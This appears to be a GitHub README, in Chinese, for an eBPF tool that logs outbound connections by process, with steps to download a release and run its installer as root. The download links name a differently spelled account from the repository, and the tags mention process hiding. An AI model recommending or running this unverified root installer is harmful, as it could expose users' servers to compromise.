Levelwhiteroom438/hosting-outbound-logger

GitHub: Levelwhiteroom438/hosting-outbound-logger

基于 eBPF 的轻量级 Linux 出站网络连接日志工具,将进程与远程 IP、端口关联记录,用于安全分析和流量审计。

Stars: 0 | Forks: 0

# 🔍 hosting-outbound-logger - 轻松追踪服务器网络流量 [![下载软件](https://img.shields.io/badge/Download-Release_Page-blue.svg)](https://github.com/Levelwhiterroom438/hosting-outbound-logger) ## 📋 此工具的功能 hosting-outbound-logger 能够识别您的 Linux 服务器上的网络活动。现代服务器环境通常会同时运行许多程序。有时,这些程序会连接到外部地址。此工具会记录这些操作。它将特定的程序与其访问的远程 IP 地址联系起来。您可以借此全面了解服务器的流量情况,而无需进行复杂的手动追踪。 ## 🛠 系统要求 此工具在基于 Linux 的环境中运行。虽然您可以从 Windows 管理安装,但传感器需要 5.8 或更高版本的 Linux 内核。请确保您的目标服务器已启用 eBPF 子系统。大多数现代发行版默认包含此功能。您需要拥有服务器的管理员权限才能部署监控代理。 ## 📥 如何下载应用程序 访问主仓库页面以获取最新版本。点击下方链接进入官方下载区域。 [https://github.com/Levelwhiterroom438/hosting-outbound-logger](https://github.com/Levelwhiteroom438/hosting-outbound-logger) 导航至页面右侧的“Releases”部分。选择最新版本并下载与您的服务器架构相匹配的软件包。 ## ⚙️ 安装步骤 1. 从发布页面将压缩文件下载到您的工作站。 2. 使用安全复制工具将文件传输到您的 Linux 服务器。 3. 在服务器上打开您的终端应用程序。 4. 使用以下命令解压文件:`tar -xvf logger-package.tar.gz`。 5. 进入解压后的目录。 6. 使用 root 权限运行安装脚本:`sudo ./install.sh`。 7. 系统将提示您输入密码。提供密码以授权安装监控探针。 ## 🚀 运行软件 安装完成后,您可以将日志记录器作为后台任务启动。 1. 执行主程序:`sudo ./outbound-logger`。 2. 应用程序将立即开始捕获出站网络数据包。 3. 它会在本地目录中创建一个名为 `network-traffic.log` 的日志文件。 4. 您可以通过运行 `tail -f network-traffic.log` 来实时查看输出。 ## 📈 了解日志 日志文件会为每次连接尝试记录四项关键信息: * 时间戳:连接开始的具体时间。 * 进程名称:发起请求的程序的标识。 * 远程 IP:流量传输的目标地址。 * 端口:用于通信的特定网络端口。 利用这些数据来验证您的服务是否仅与已授权的 endpoint 进行通信。 ## 🛡️ 安全与保障 该日志记录器使用 eBPF 技术。此技术允许内核监控事件,而不会改变您程序的运行状态。它在您的网络栈中创建了一个只读桥接。这确保了日志记录器不会导致您的生产服务器出现性能下降或不稳定的情况。 ## 🔧 常见问题 **此工具会影响我的网络速度吗?** 不会。该工具在内核级别运行,影响微乎其微。它异步处理数据以防止延迟。 **我可以将日志导出到其他位置吗?** 可以。您可以使用标准的 Linux 重定向命令将输出通过管道传递到集中式日志服务器或 SIEM 工具。 **在生产服务器上运行安全吗?** 安全。其设计侧重于稳定性。它仅监控事件,而不会拦截或阻塞流量。 **如果我看到未知的 IP 地址该怎么办?** 请检查日志中的进程名称字段。如果您无法识别该进程,请调查与该程序关联的文件路径。 **我需要重启服务器吗?** 不需要。您无需重启即可安装或使用此工具。它会立即与正在运行的内核集成。 **如何更新日志记录器?** 从提供的链接下载最新的软件包,然后再次运行安装脚本。它将使用最新版本覆盖旧文件。 ## ⚠️ 常见问题排查 如果日志记录器无法启动,请验证您的内核版本。在终端中运行 `uname -r`。如果结果低于 5.8,请升级您的内核以支持所需的功能。 如果您看到权限错误,请确保您使用了 `sudo` 运行日志记录器。该工具需要对网络栈的深度访问权限,才能捕获必要的数据包信息。 如果日志没有任何输出,请检查您的防火墙是否阻止了初始探针。确保您的系统允许 eBPF 插桩。您可以通过检查内核配置中的 `CONFIG_BPF_SYSCALL` 来验证这一点。 ## 📧 支持与反馈 本项目由社区维护。如果您发现错误或有任何建议,请在 GitHub 追踪器上提出 issue。请提供您的操作系统版本和日志文件的内容。维护人员会审查这些报告,以改善软件的稳定性。
标签:CSV日志, Docker镜像, Google搜索, IP 地址批量处理, JSON日志, 内核级监控, 出站连接追踪, 安全渗透, 异常流量检测, 系统监控工具, 网络可见性, 网络流量分析, 网络行为审计, 进程流量日志, 进程隐藏